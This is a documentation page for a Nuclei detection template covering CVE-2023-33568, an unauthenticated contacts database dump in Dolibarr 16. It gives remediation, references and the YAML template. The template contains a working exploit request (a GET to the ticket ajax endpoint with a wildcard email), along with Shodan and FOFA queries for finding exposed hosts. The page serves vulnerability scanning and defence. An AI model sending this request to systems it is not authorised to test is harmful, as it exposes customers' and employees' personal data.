Skip to content
Nuclei Templates

Dolibarr Unauthenticated Contacts Database Theft

ID: CVE-2023-33568

Severity: high

Author: DhiyaneshDK

Tags: cve2023,cve,dolibarr,unauth

Description

Section titled “Description”

An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company’s entire customer file, prospects, suppliers, and employee information if a contact file exists.

YAML Source

Section titled “YAML Source”
id: CVE-2023-33568


info:
  name: Dolibarr Unauthenticated Contacts Database Theft
  author: DhiyaneshDK
  severity: high
  description: |
    An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
  impact: |
    The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability.
  reference:
    - https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33568
    - https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7
    - https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e
    - https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-33568
    cwe-id: CWE-552
    epss-score: 0.4855
    epss-percentile: 0.97483
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: dolibarr
    product: dolibarr_erp\/crm
    shodan-query: http.favicon.hash:440258421
    fofa-query: icon_hash=440258421
  tags: cve2023,cve,dolibarr,unauth


http:
  - method: GET
    path:
      - "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"database_name":'
          - '"database_user":'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e2f382f4fe295c23d845404261d745deac82a0a54d6dc9b72c8cd5f13c8af74d02207de30b7d94dee70a8aedf12760b2fe78d1725b9a2de4c8c9136f5a4ae00106d1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33568.yaml"

View on Github